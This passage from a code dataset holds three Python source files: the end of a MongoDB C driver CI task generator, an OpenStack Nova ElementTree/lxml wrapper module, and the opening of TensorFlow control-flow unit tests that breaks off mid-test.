self.display('ssl'),
self.display('sasl'),
self.display('auth'))
# E.g., test-latest-server-auth-sasl-ssl needs debug-compile-sasl-ssl.
# Coverage tasks use a build function instead of depending on a task.
if self.valgrind:
self.add_dependency('debug-compile-valgrind')
elif self.asan and self.ssl:
self.add_dependency('debug-compile-asan-clang-%s' % (
self.display('ssl'),))
elif self.asan:
self.add_dependency('debug-compile-asan-clang')
elif not self.coverage:
self.add_dependency('debug-compile-%s-%s' % (
self.display('sasl'), self.display('ssl')))
@property
def name(self):
def name_part(axis_name):
part = self.display(axis_name)
if part == 'replica_set':
return 'replica-set'
elif part == 'sharded_cluster':
return 'sharded'
return part
return self.name_prefix + '-' + '-'.join(
name_part(axis_name) for axis_name in self.axes
if getattr(self, axis_name) or axis_name in ('auth', 'sasl', 'ssl'))
def to_dict(self):
task = super(IntegrationTask, self).to_dict()
commands = task['commands']
if self.depends_on:
commands.append(
func('fetch build', BUILD_NAME=self.depends_on['name']))
if self.coverage:
commands.append(func('debug-compile-coverage-notest-%s-%s' % (
self.display('sasl'), self.display('ssl')
)))
commands.append(bootstrap(VERSION=self.version,
TOPOLOGY=self.topology,
AUTH='auth' if self.auth else 'noauth',
SSL=self.display('ssl')))
commands.append(run_tests(VALGRIND=self.on_off('valgrind'),
ASAN=self.on_off('asan'),
AUTH=self.display('auth'),
SSL=self.display('ssl')))
if self.coverage:
commands.append(func('update codecov.io'))
return task
def _check_allowed(self):
if self.valgrind:
prohibit(self.asan)
prohibit(self.sasl)
require(self.ssl in ('openssl', False))
prohibit(self.coverage)
# Valgrind only with auth+SSL or no auth + no SSL.
if self.auth:
require(self.ssl == 'openssl')
else:
prohibit(self.ssl)
if self.auth:
require(self.ssl)
if self.sasl == 'sspi':
# Only one SSPI configuration is tested.
require(self.topology == 'server')
require(self.version == 'latest')
require(self.ssl == 'winssl')
require(self.auth)
if not self.ssl:
prohibit(self.sasl)
if self.coverage:
prohibit(self.sasl)
if self.auth:
require(self.ssl == 'openssl')
else:
prohibit(self.ssl)
if self.asan:
prohibit(self.sasl)
prohibit(self.coverage)
# Address sanitizer only with auth+SSL or no auth + no SSL.
if self.auth:
require(self.ssl == 'openssl')
else:
prohibit(self.ssl)
all_tasks = chain(all_tasks, IntegrationTask.matrix())
class DNSTask(MatrixTask):
axes = OD([('auth', [False, True]),
('ssl', ['openssl', 'winssl', 'darwinssl'])])
name_prefix = 'test-dns'
def __init__(self, *args, **kwargs):
super(DNSTask, self).__init__(*args, **kwargs)
sasl = 'sspi' if self.ssl == 'winssl' else 'sasl'
self.add_dependency('debug-compile-%s-%s' % (sasl, self.display('ssl')))
@property
def name(self):
return self.name_prefix + '-' + '-'.join(
self.display(axis_name) for axis_name in self.axes
if getattr(self, axis_name))
def to_dict(self):
task = super(MatrixTask, self).to_dict()
commands = task['commands']
commands.append(
func('fetch build', BUILD_NAME=self.depends_on['name']))
orchestration = bootstrap(TOPOLOGY='replica_set',
AUTH='auth' if self.auth else 'noauth',
SSL='ssl')
if self.auth:
orchestration['vars']['AUTHSOURCE'] = 'thisDB'
orchestration['vars']['ORCHESTRATION_FILE'] = 'auth-thisdb-ssl'
commands.append(orchestration)
commands.append(run_tests(SSL='ssl',
AUTH=self.display('auth'),
DNS='dns-auth' if self.auth else 'on'))
return task
all_tasks = chain(all_tasks, DNSTask.matrix())
class CompressionTask(MatrixTask):
axes = OD([('compression', ['zlib', 'snappy', 'compression'])])
name_prefix = 'test-latest-server'
def __init__(self, *args, **kwargs):
super(CompressionTask, self).__init__(*args, **kwargs)
self.add_dependency('debug-compile-' + self._compressor_suffix())
self.add_tags('compression', 'latest')
self.add_tags(*self._compressor_list())
@property
def name(self):
return self.name_prefix + '-' + self._compressor_suffix()
def to_dict(self):
task = super(CompressionTask, self).to_dict()
commands = task['commands']
commands.append(func('fetch build', BUILD_NAME=self.depends_on['name']))
if self.compression == 'compression':
orchestration_file = 'snappy-zlib'
else:
orchestration_file = self.compression
commands.append(bootstrap(
AUTH='noauth',
SSL='nossl',
ORCHESTRATION_FILE=orchestration_file))
commands.append(run_tests(
AUTH='noauth',
SSL='nossl',
COMPRESSORS=','.join(self._compressor_list())))
return task
def _compressor_suffix(self):
if self.compression == 'zlib':
return 'compression-zlib'
elif self.compression == 'snappy':
return 'compression-snappy'
else:
return 'compression'
def _compressor_list(self):
if self.compression == 'zlib':
return ['zlib']
elif self.compression == 'snappy':
return ['snappy']
else:
return ['snappy', 'zlib']
all_tasks = chain(all_tasks, CompressionTask.matrix())
class SpecialIntegrationTask(NamedTask):
def __init__(self, task_name, depends_on='debug-compile-sasl-openssl',
extra_commands=None, uri=None,
tags=None, version='latest', topology='server'):
commands = [func('fetch build', BUILD_NAME=depends_on),
bootstrap(VERSION=version, TOPOLOGY=topology),
run_tests(uri)] + (extra_commands or [])
super(SpecialIntegrationTask, self).__init__(task_name,
commands=commands,
depends_on=depends_on,
tags=tags)
all_tasks = chain(all_tasks, [
# Verify that retryWrites=true is ignored with standalone.
SpecialIntegrationTask('retry-true-latest-server',
uri='mongodb://localhost/?retryWrites=true'),
# Verify that retryWrites=true is ignored with old server.
SpecialIntegrationTask('retry-true-3.4-replica-set',
version='3.4',
topology='replica_set'),
SpecialIntegrationTask('test-latest-server-hardened',
'hardened-compile',
tags=['hardened', 'latest']),
])
class AuthTask(MatrixTask):
axes = OD([('sasl', ['sasl', 'sspi', False]),
('ssl', ['openssl', 'darwinssl', 'winssl'])])
name_prefix = 'authentication-tests'
def __init__(self, *args, **kwargs):
super(AuthTask, self).__init__(*args, **kwargs)
self.add_tags('authentication-tests',
self.display('ssl'),
self.display('sasl'))
self.add_dependency('debug-compile-%s-%s' % (
self.display('sasl'), self.display('ssl')))
self.commands.extend([
func('fetch build', BUILD_NAME=self.depends_on['name']),
func('run auth tests')])
@property
def name(self):
rv = self.name_prefix + '-' + self.display('ssl')
if self.sasl:
return rv
else:
return rv + '-nosasl'
def _check_allowed(self):
both_or_neither(self.ssl == 'winssl', self.sasl == 'sspi')
if not self.sasl:
require(self.ssl == 'openssl')
all_tasks = chain(all_tasks, AuthTask.matrix())
class PostCompileTask(NamedTask):
def __init__(self, *args, **kwargs):
super(PostCompileTask, self).__init__(*args, **kwargs)
self.commands.insert(
0, func('fetch build', BUILD_NAME=self.depends_on['name']))
all_tasks = chain(all_tasks, [
PostCompileTask(
'test-valgrind-memcheck-mock-server',
tags=['test-valgrind'],
depends_on='debug-compile-valgrind',
commands=[func('run mock server tests', VALGRIND='on', SSL='ssl')]),
PostCompileTask(
'test-asan-memcheck-mock-server',
tags=['test-asan'],
depends_on='debug-compile-asan-clang',
commands=[func('run mock server tests', ASAN='on', SSL='ssl')]),
# Compile with a function, not a task: gcov files depend on the absolute
# path of the executable, so we can't compile as a separate task.
NamedTask(
'test-coverage-mock-server',
tags=['test-coverage'],
commands=[func('debug-compile-coverage-notest-nosasl-openssl'),
func('run mock server tests', SSL='ssl'),
func('update codecov.io')]),
NamedTask(
'test-coverage-latest-server-dns',
tags=['test-coverage'],
exec_timeout_secs=3600,
commands=[func('debug-compile-coverage-notest-nosasl-openssl'),
bootstrap(TOPOLOGY='replica_set', AUTH='auth', SSL='ssl'),
run_tests(AUTH='auth', SSL='ssl', DNS='on'),
func('update codecov.io')]),
NamedTask(
'authentication-tests-memcheck',
tags=['authentication-tests', 'valgrind'],
exec_timeout_secs=3600,
commands=[
shell_mongoc("""
VALGRIND=ON DEBUG=ON CC='${CC}' MARCH='${MARCH}' SASL=AUTO \
SSL=OPENSSL CFLAGS='-DBSON_MEMCHECK' sh .evergreen/compile.sh
"""),
func('run auth tests', valgrind='true')]),
])
class SSLTask(Task):
def __init__(self, version, patch, cflags=None, fips=False, **kwargs):
full_version = version + patch + ('-fips' if fips else '')
script = ''
if cflags:
script += 'export CFLAGS=%s\n' % (cflags,)
script += "DEBUG=ON CC='${CC}' MARCH='${MARCH}' SASL=OFF"
if 'libressl' in version:
script += " SSL=LIBRESSL"
else:
script += " SSL=OPENSSL"
if fips:
script += " OPENSSL_FIPS=1"
script += " sh .evergreen/compile.sh"
super(SSLTask, self).__init__(commands=[
func('install ssl', SSL=full_version),
shell_mongoc(script),
func('run auth tests', **kwargs),
func('upload build')])
self.version = version
self.fips = fips
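# e.g. SSLTask('openssl-1.0.1', 'u', fips=True).name evaluates to
# 'build-and-run-authentication-tests-openssl-1.0.1-fips'.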
@property
def name(self):
s = 'build-and-run-authentication-tests-' + self.version
if self.fips:
return s + '-fips'
return s
all_tasks = chain(all_tasks, [
SSLTask('openssl-0.9.8', 'zh', obsolete_tls=True),
SSLTask('openssl-1.0.0', 't', obsolete_tls=True),
SSLTask('openssl-1.0.1', 'u', cflags='-Wno-redundant-decls'),
SSLTask('openssl-1.0.1', 'u', cflags='-Wno-redundant-decls', fips=True),
SSLTask('openssl-1.0.2', 'l'),
SSLTask('openssl-1.1.0', 'f'),
SSLTask('libressl-2.5', '.2', require_tls12=True),
NamedTask('compile-libmongocapi',
commands=[shell_mongoc(r'''
. ./.evergreen/find-cmake.sh
${setup_android_toolchain|}
export ${libmongocapi_compile_env|}
mkdir cmake-build-libmongocapi
$CMAKE \
-DCMAKE_INSTALL_PREFIX=cmake-build-libmongocapi \
-DENABLE_SNAPPY=OFF \
-DENABLE_AUTOMATIC_INIT_AND_CLEANUP=OFF \
-DENABLE_ZLIB=OFF -DENABLE_SSL=OFF \
-DENABLE_SASL=OFF \
-DENABLE_TESTS=OFF \
-DENABLE_SRV=OFF \
-DENABLE_EXAMPLES=OFF \
-DENABLE_STATIC=OFF \
-DENABLE_SHM_COUNTERS=OFF \
${libmongocapi_cmake_flags}
make install VERBOSE=1''')]),
])
class IPTask(MatrixTask):
axes = OD([('client', ['ipv6', 'ipv4', 'localhost']),
('server', ['ipv6', 'ipv4'])])
name_prefix = 'test-latest'
def __init__(self, *args, **kwargs):
super(IPTask, self).__init__(*args, **kwargs)
self.add_tags('nossl', 'nosasl', 'server', 'ipv4-ipv6', 'latest')
self.add_dependency('debug-compile-nosasl-nossl')
self.commands.extend([
func('fetch build', BUILD_NAME=self.depends_on['name']),
bootstrap(IPV4_ONLY=self.on_off(server='ipv4')),
run_tests(IPV4_ONLY=self.on_off(server='ipv4'),
URI={'ipv6': 'mongodb://[::1]/',
'ipv4': 'mongodb://127.0.0.1/',
'localhost': 'mongodb://localhost/'}[self.client])])
def display(self, axis_name):
return axis_name + '-' + getattr(self, axis_name)
@property
def name(self):
return '-'.join([
self.name_prefix, self.display('server'), self.display('client'),
'noauth', 'nosasl', 'nossl'])
def _check_allowed(self):
# This would fail by design.
if self.server == 'ipv4':
prohibit(self.client == 'ipv6')
# Default configuration is tested in other variants.
if self.server == 'ipv6':
prohibit(self.client == 'localhost')
all_tasks = chain(all_tasks, IPTask.matrix())
all_tasks = list(all_tasks)
| apache-2.0 | 7,362,404,252,155,893,000 | 38.618543 | 111 | 0.533766 | false |
windskyer/k_nova | nova_extension/compute/ibm/etree_wrapper.py | 1 | 4367 | # =================================================================
# =================================================================
"""Wrapper around ElementTree, using either the native implementation or lxml.
This module creates a wrapper around the ElementTree library, picking an
appropriate implementation for the environment.
This module normalizes:
* the exception when parsing, normalized to ParseError
* lxml doesn't support unicode strings with encoding, so lxml converts unicode
document to ascii.
Reasons to use this:
* not all systems have the lxml library
* Python 2.6's native ElementTree has minimal support for XPATH.
This module uses the following rule to pick the implementation:
* If using Python 2.7, uses the native implementation.
* Otherwise, if lxml is available, uses the lxml implementation.
* Otherwise, uses the native implementation.
(In this case, XPATH support will be minimal).
References:
* Python 2.7 native:
http://docs.python.org/2.7/library/xml.etree.elementtree.html
* Python 2.6 native:
http://docs.python.org/2.6/library/xml.etree.elementtree.html
* lxml: http://lxml.de/
To use this module:
import etree_wrapper
etree_wrapper.XML(some_xml_string)
If the XML string passed to XML() is not valid, a ParseError is raised.
"""
import sys
class ParseError(Exception):
"""Raised if the XML string could not be parsed."""
pass
class _NativeImpl:
def XML(self, raw_str):
from xml.etree import ElementTree
try:
from xml.etree.ElementTree \
import ParseError as ImplParseError # noqa
except ImportError:
from xml.parsers.expat import ExpatError as ImplParseError # noqa
try:
return ElementTree.XML(raw_str)
except ImplParseError as e:
raise ParseError(e)
def SubElement(self, parent, tag, attrib={}, **extra):
from xml.etree import ElementTree
return ElementTree.SubElement(parent, tag, attrib=attrib, **extra)
def tostring(self, element):
from xml.etree import ElementTree
return ElementTree.tostring(element)
def register_namespace(self, prefix, namespace):
from xml.etree import ElementTree
return ElementTree.register_namespace(prefix, namespace)
class _LxmlImpl:
def XML(self, raw_str):
from lxml import etree
# lxml does not support parsing a unicode string that has an encoding
# value, so we convert a unicode string to ascii.
raw_str_ascii = raw_str.encode('ascii', 'replace')
try:
return etree.XML(raw_str_ascii)
except etree.XMLSyntaxError as e:
raise ParseError(e)
def SubElement(self, parent, tag, attrib={}, **extra):
from lxml import etree
return etree.SubElement(parent, tag, attrib=attrib, **extra)
def tostring(self, element):
from lxml import etree
return etree.tostring(element)
def register_namespace(self, prefix, namespace):
"""This is not necessary for lxml."""
pass
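# Implementation selection, per the module docstring: the native ElementTree
# on Python 2.7+, lxml on older interpreters when it is importable, and the
# native implementation otherwise.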
def _calc_impl_name(version, have_lxml=None):
if version < (2, 7):
if have_lxml:
return 'lxml'
return 'native'
return 'native'
def _create_impl(impl_name):
if impl_name == 'lxml':
return _LxmlImpl()
else:
return _NativeImpl()
def _check_have_lxml():
try:
from lxml import etree
return hasattr(etree, 'XML')
except ImportError:
return False
def _create_impl_for_system():
version = sys.version_info
if version < (2, 7):
have_lxml = _check_have_lxml()
else:
have_lxml = None
impl_name = _calc_impl_name(version, have_lxml=have_lxml)
return _create_impl(impl_name)
_impl = _create_impl_for_system()
def XML(raw_str):
"""Parse the XML string.
Raises ParseError if the raw_str could not be parsed.
"""
return _impl.XML(raw_str)
def SubElement(parent, tag, attrib={}, **extra):
"""See the SubElement() documentation from python xml or lxml."""
return _impl.SubElement(parent, tag, attrib=attrib, **extra)
def tostring(element):
"""See the tostring() documentation from python xml or lxml."""
return _impl.tostring(element)
def register_namespace(prefix, namespace):
return _impl.register_namespace(prefix, namespace)
| apache-2.0 | -7,815,707,756,236,600,000 | 27.542484 | 78 | 0.650561 | false |
dhalleine/tensorflow | tensorflow/python/kernel_tests/control_flow_ops_py_test.py | 1 | 59408 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-long-lambda
"""Tests for tensorflow.ops.control_flow_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.python.framework import function
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import gen_data_flow_ops
from tensorflow.python.ops import logging_ops
def check_op_order(graph):
"""Sanity check on the ordering of op id."""
for op in graph.get_operations():
for v in op.inputs:
assert v.op._id < op._id or op.type == "Merge", (
"The id of %s must be less than the id of %s" % (v.op.name, op.name))
return True
def check_consumers(graph):
"""Sanity check on the consumer list of the tensors."""
consumer_count = {}
for op in graph.get_operations():
for v in op.inputs:
cnt = consumer_count.get(v, 0)
consumer_count[v] = cnt + 1
for k, v in consumer_count.items():
if len(k.consumers()) != v:
return False
return True
def isum(s):
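  # Builds a tf.while_loop that adds the loop counter i (0 through 9) into s;
  # with s = 0 this evaluates to 45.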
i = tf.constant(0, name="i")
c = lambda i, s: tf.less(i, 10)
b = lambda i, s: [tf.add(i, 1), tf.add(i, s)]
_, r_s = tf.while_loop(c, b, [i, s])
return r_s
class ControlFlowTest(tf.test.TestCase):
def testRefIdentity(self):
with self.test_session():
v = tf.Variable(7)
v = control_flow_ops._Identity(v)
op = tf.assign(v, 9)
v2 = control_flow_ops.with_dependencies([op], v)
self.assertTrue(check_op_order(v.graph))
self.assertTrue(isinstance(v2, tf.Tensor))
tf.initialize_all_variables().run()
self.assertEqual(9, v2.eval())
def testRefEnter(self):
with self.test_session():
v = tf.Variable(7)
enter_v = control_flow_ops._Enter(v, "foo_1", is_constant=True)
nine = tf.constant(9)
enter_nine = control_flow_ops.enter(nine, "foo_1")
op = tf.assign(enter_v, enter_nine)
v2 = control_flow_ops.with_dependencies([op], enter_v)
v3 = control_flow_ops.exit(v2)
tf.initialize_all_variables().run()
self.assertEqual(9, v3.eval())
def testRefSwitch(self):
with self.test_session():
v = tf.Variable(7)
p = tf.constant(True)
v1 = control_flow_ops._SwitchRefOrTensor(v.ref(), p)
v2 = tf.assign(v1[1], 9)
tf.initialize_all_variables().run()
self.assertEqual(9, v2.eval())
def testEnterMulExit(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
enter_data = control_flow_ops.enter(data, "foo_1", False)
five = tf.constant(5)
enter_five = control_flow_ops.enter(five, "foo_1", False)
mul_op = tf.mul(enter_data, enter_five)
exit_op = control_flow_ops.exit(mul_op)
result = exit_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeIndexedSlices(self):
with self.test_session():
values = tf.constant([1, 2, 3, 4, 5, 6])
indices = tf.constant([0, 2, 4, 6, 8, 10])
data = tf.IndexedSlices(values, indices)
pred = tf.convert_to_tensor(True)
switch_op = control_flow_ops.switch(data, pred)
merge_op = control_flow_ops.merge(switch_op)[0]
val = merge_op.values.eval()
ind = merge_op.indices.eval()
self.assertAllEqual(np.arange(1, 7), val)
self.assertAllEqual(np.arange(0, 12, 2), ind)
def testSwitchDeadBranch(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
ports = tf.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
dead_branch = tf.identity(switch_op[0])
with self.assertRaisesWithPredicateMatch(
tf.errors.InvalidArgumentError,
lambda e: "The tensor returned for" in str(e)):
dead_branch.eval()
def testSwitchMergeLess(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
zero = tf.convert_to_tensor(0)
one = tf.convert_to_tensor(1)
less_op = tf.less(zero, one)
switch_op = control_flow_ops.switch(data, less_op)
merge_op = control_flow_ops.merge(switch_op)[0]
result = merge_op.eval()
self.assertAllEqual(np.arange(1, 7), result)
def testSwitchMergeAddIdentity(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
ports = tf.convert_to_tensor(False, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = tf.constant(1)
add_op = tf.add(switch_op[0], one)
id_op = tf.identity(switch_op[1])
merge_op = control_flow_ops.merge([add_op, id_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x + 1 for x in [1, 2, 3, 4, 5, 6]]), result)
def testSwitchMergeAddMul(self):
with self.test_session():
data = tf.constant([1, 2, 3, 4, 5, 6], name="data")
ports = tf.convert_to_tensor(True, name="ports")
switch_op = control_flow_ops.switch(data, ports)
one = tf.constant(1)
add_op = tf.add(switch_op[0], one)
five = tf.constant(5)
mul_op = tf.mul(switch_op[1], five)
merge_op = control_flow_ops.merge([add_op, mul_op])[0]
result = merge_op.eval()
self.assertAllEqual(np.array([x * 5 for x in [1, 2, 3, 4, 5, 6]]), result)
def testLoop_false(self):
with self.test_session():
false = tf.convert_to_tensor(False)
n = tf.constant(10)
enter_false = control_flow_ops.enter(false, "foo_1", False)
enter_n = control_flow_ops.enter(n, "foo_1", False)
merge_n = control_flow_ops.merge([enter_n, enter_n], name="merge_n")[0]
switch_n = control_flow_ops.switch(merge_n, enter_false)
exit_n = control_flow_ops.exit(switch_n[0])
next_n = control_flow_ops.next_iteration(switch_n[0])
merge_n.op._update_input(1, next_n)
result = exit_n.eval()
self.assertAllEqual(10, result)
def testLoop_1(self):
with self.test_session():
zero = tf.constant(0)
one = tf.constant(1)
n = tf.constant(10)
enter_i = control_flow_ops.enter(zero, "foo", False)
enter_one = control_flow_ops.enter(one, "foo", True)
enter_n = control_flow_ops.enter(n, "foo", True)
with tf.device("/gpu:0"):
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = tf.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = tf.add(switch_i[1], enter_one)
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testLoop_2(self):
with self.test_session():
zero = tf.constant(0)
one = tf.constant(1)
n = tf.constant(10)
enter_i = control_flow_ops.enter(zero, "foo", False)
enter_one = control_flow_ops.enter(one, "foo", True)
enter_n = control_flow_ops.enter(n, "foo", True)
merge_i = control_flow_ops.merge([enter_i, enter_i])[0]
less_op = tf.less(merge_i, enter_n)
cond_op = control_flow_ops.loop_cond(less_op)
switch_i = control_flow_ops.switch(merge_i, cond_op)
add_i = tf.add(switch_i[1], enter_one)
with tf.device("/gpu:0"):
next_i = control_flow_ops.next_iteration(add_i)
merge_i.op._update_input(1, next_i)
exit_i = control_flow_ops.exit(switch_i[0])
result = exit_i.eval()
self.assertAllEqual(10, result)
def testCondBool(self):
values = tf.constant(10)
fn1 = lambda: tf.add(values, 1)
fn2 = lambda: tf.sub(values, 1)
with self.assertRaisesRegexp(TypeError, "must not be a Python bool"):
_ = tf.cond(False, fn1, fn2)
def testCondIndexedSlices(self):
with self.test_session():
values = tf.constant(10)
indices = tf.constant(0)
x = tf.IndexedSlices(values, indices)
pred = tf.less(1, 2)
fn1 = lambda: tf.IndexedSlices(tf.add(x.values, 1), indices)
fn2 = lambda: tf.IndexedSlices(tf.sub(x.values, 1), indices)
r = tf.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertTrue(check_op_order(x.values.graph))
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
def testCondIndexedSlicesDifferentTypes(self):
with self.test_session():
values = tf.constant(10)
i_32 = tf.convert_to_tensor(0, name="one", dtype=tf.int32)
i_64 = tf.convert_to_tensor(0, name="one", dtype=tf.int64)
x = tf.IndexedSlices(values, i_32)
pred = tf.less(1, 2)
fn1 = lambda: tf.IndexedSlices(tf.add(x.values, 1), i_32)
fn2 = lambda: tf.IndexedSlices(tf.sub(x.values, 1), i_64)
r = tf.cond(pred, fn1, fn2)
val = r.values.eval()
ind = r.indices.eval()
self.assertTrue(check_op_order(x.values.graph))
self.assertAllEqual(11, val)
self.assertAllEqual(0, ind)
self.assertTrue(ind.dtype == np.int64)
def testCondColocation(self):
with self.test_session(use_gpu=True):
with tf.device("/cpu:0"):
v = tf.Variable(7.0)
x = tf.constant(10.0)
pred = tf.less(1.0, 2.0)
fn1 = lambda: tf.add(v, 1.0)
fn2 = lambda: tf.sub(x, 1.0)
r = tf.cond(pred, fn1, fn2)
for op in x.graph.get_operations():
if op.name == "cond/Add/Switch":
self.assertDeviceEqual(op.device, "/cpu:0")
def _testCond_1(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
x = tf.constant(10)
pred = tf.less(1, 2)
fn1 = lambda: tf.add(x, 1)
fn2 = lambda: tf.sub(x, 1)
r = tf.cond(pred, fn1, fn2)
result = r.eval()
self.assertTrue(check_op_order(x.graph))
self.assertAllEqual(11, result)
def testCond_1(self):
self._testCond_1(use_gpu=False)
self._testCond_1(use_gpu=True)
def testCond_2(self):
with self.test_session():
x = tf.constant(10)
r = tf.cond(tf.less(1, 0), lambda: tf.add(x, 1), lambda: tf.sub(x, 1))
result = r.eval()
self.assertTrue(check_op_order(x.graph))
self.assertAllEqual(9, result)
def testCond_3(self):
with self.test_session():
x = tf.constant(10)
pred = tf.less(1, 2)
fn1 = lambda: tf.add(x, 1)
fn2 = lambda: tf.sub(x, 1)
fn3 = lambda: tf.add(tf.cond(pred, fn1, fn2), 1)
r = tf.cond(pred, fn3, fn2)
result = r.eval()
self.assertTrue(check_op_order(x.graph))
self.assertAllEqual(12, result)
def testCond_4(self):
with self.test_session():
v1 = tf.Variable(7)
v2 = tf.Variable(7)
v3 = tf.Variable(7)
age = tf.constant(3)
max_age = tf.constant(2)
pred = tf.greater(age, max_age)
fn1 = lambda: [tf.assign(v1, 1).op, tf.assign(v2, 2).op]
fn2 = lambda: [tf.assign(v3, 3).op, tf.constant(10).op]
r = tf.cond(pred, fn1, fn2)
tf.initialize_all_variables().run()
self.assertEqual(len(r), 2)
result = r[1].eval()
self.assertTrue(check_op_order(age.graph))
self.assertAllEqual(True, result)
self.assertAllEqual(7, v1.eval())
self.assertAllEqual(2, v2.eval())
self.assertAllEqual(7, v3.eval())
def testCond_5(self):
with self.test_session():
alive = tf.constant(True, name="alive")
count = tf.constant(0, name="count")
def body(i):
return tf.cond(
alive, lambda: [tf.less(i, 3), tf.add(count, 1)],
lambda: [alive, count])
for i in range(10):
alive, count = body(i)
self.assertAllEqual(4, count.eval())
def testCond_6(self):
with self.test_session():
v1 = tf.Variable([7])
age = tf.constant(3)
pred = tf.greater(age, 4)
fn1 = lambda: age
fn2 = lambda: v1
r = tf.cond(pred, fn1, fn2)
tf.initialize_all_variables().run()
result = r.eval()
self.assertAllEqual(np.array([7]), result)
def testCond_7(self):
with self.test_session() as sess:
x = tf.constant(10)
y = tf.constant(200)
pred = tf.less(1, 2)
fn1 = lambda: [tf.add(x, 1), tf.add(x, 2)]
fn2 = lambda: [y, y]
r = tf.cond(pred, fn1, fn2)
self.assertAllEqual([11, 12], sess.run(r))
def testCondGrad_1(self):
with self.test_session():
x = tf.constant(10.0, name="x")
pred = tf.less(1, 2)
fn1 = lambda: tf.identity(x)
fn2 = lambda: tf.identity(x)
r = tf.cond(pred, fn1, fn2)
grad = tf.gradients(r, [x])[0]
result = grad.eval()
self.assertAllEqual(1.0, result)
def testCondGrad_2(self):
with self.test_session():
c = tf.placeholder(tf.int32, shape=[])
x = tf.constant(10.0)
pred = tf.less(c, 2)
fn1 = lambda: tf.mul(x, 42.0)
fn2 = lambda: tf.mul(x, 3.0)
r = tf.cond(pred, fn1, fn2)
grad = tf.gradients(r, [x])[0]
self.assertAllEqual(42.0, grad.eval(feed_dict={c: 1}))
self.assertAllEqual(3.0, grad.eval(feed_dict={c: 3}))
def testNestedCond_Simple(self):
with self.test_session():
x = tf.constant(0., name="X")
y = tf.cond(tf.constant(True),
lambda: x,
lambda: tf.cond(x < 1., lambda: x, lambda: x))
result = tf.gradients(y, x)[0]
self.assertEqual(1.0, result.eval())
z = tf.cond(tf.constant(False),
lambda: x,
lambda: tf.cond(x < 1., lambda: x, lambda: x))
result = tf.gradients(z, x)[0]
self.assertEqual(1.0, result.eval())
def testCondGrad_Gather(self):
with self.test_session() as sess:
v1 = tf.Variable([1.0, 42.0])
c = tf.placeholder(tf.int32, shape=[])
pred = tf.less(c, 2)
fn1 = lambda: tf.identity(v1)
fn2 = lambda: tf.gather(v1, [1, 1])
r = tf.cond(pred, fn1, fn2)
grad = tf.gradients(r, [v1])[0]
tf.initialize_all_variables().run()
# Should just be [1, 1], but possibly a sparse representation
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 1})
dense_gv = [sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [1.0, 1.0])
# Should be [0, 2], as the else forwards v1[1] twice
gv, gi = sess.run([grad.values, grad.indices], feed_dict={c: 3})
dense_gv = [sum([y for (x, y) in zip(gi, gv) if x == i]) for i in range(2)
]
self.assertAllEqual(dense_gv, [0.0, 2.0])
# Microbenchmark: 10,000 iterations took 0.21s.
def testWhile_1(self):
with self.test_session():
n = tf.constant(0)
c = lambda x: tf.less(x, 10000)
b = lambda x: tf.add(x, 1)
r = tf.while_loop(c, b, [n], parallel_iterations=20)
self.assertEqual(10000, r.eval())
def testWhileWithRefs_1(self):
with self.test_session() as sess:
x = tf.Variable(0).ref()
i = tf.constant(0)
c = lambda i, x: tf.less(i, 100)
self.assertEqual(x.dtype, tf.int32_ref)
def b(i, x):
self.assertEqual(x.dtype, tf.int32_ref)
return (i+1, gen_array_ops._ref_identity(x))
r = tf.while_loop(c, b, [i, x], parallel_iterations=5)
tf.initialize_all_variables().run()
self.assertEqual(r[0].dtype, tf.int32)
self.assertEqual(r[1].dtype, tf.int32_ref)
value_i, value_x = sess.run(r)
self.assertEqual(100, value_i)
self.assertEqual(0, value_x)
def testWhile_2(self):
with self.test_session():
s = tf.constant(0)
r = isum(s)
self.assertAllEqual(45, r.eval())
# Have more than 10 parallel iterations and hence exercise k-bound
# most of the time.
def testWhile_3(self):
with self.test_session():
def compute(i, m, c, o):
m, c = [tf.add(m, 1), tf.add(c, 1)]
o = tf.add(o, m)
o = tf.add(o, c)
i = tf.add(i, 1)
return [i, m, c, o]
i = tf.convert_to_tensor(0)
m = tf.convert_to_tensor(0)
c = tf.convert_to_tensor(0)
o = tf.convert_to_tensor(0)
d = tf.convert_to_tensor(100)
r = tf.while_loop(
lambda i, m, c, o: tf.less(i, d), compute, [i, m, c, o])
result = r[3].eval()
self.assertTrue(check_op_order(i.graph))
self.assertAllEqual(10100, result)
def testWhile_4(self):
with self.test_session():
def compute(i, m, c, o):
m, c = [tf.gather(x, i), tf.gather(x, i)]
o = tf.add(o, m)
o = tf.add(o, c)
i = tf.add(i, 1)
return [i, m, c, o]
i = tf.convert_to_tensor(0)
